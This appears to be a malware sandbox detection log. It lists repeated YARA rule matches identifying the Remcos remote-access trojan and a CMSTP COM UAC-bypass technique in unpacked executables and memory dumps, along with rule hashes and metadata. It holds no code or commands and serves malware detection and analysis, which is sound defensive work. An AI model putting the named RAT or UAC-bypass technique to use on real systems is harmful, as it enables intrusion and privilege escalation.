Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
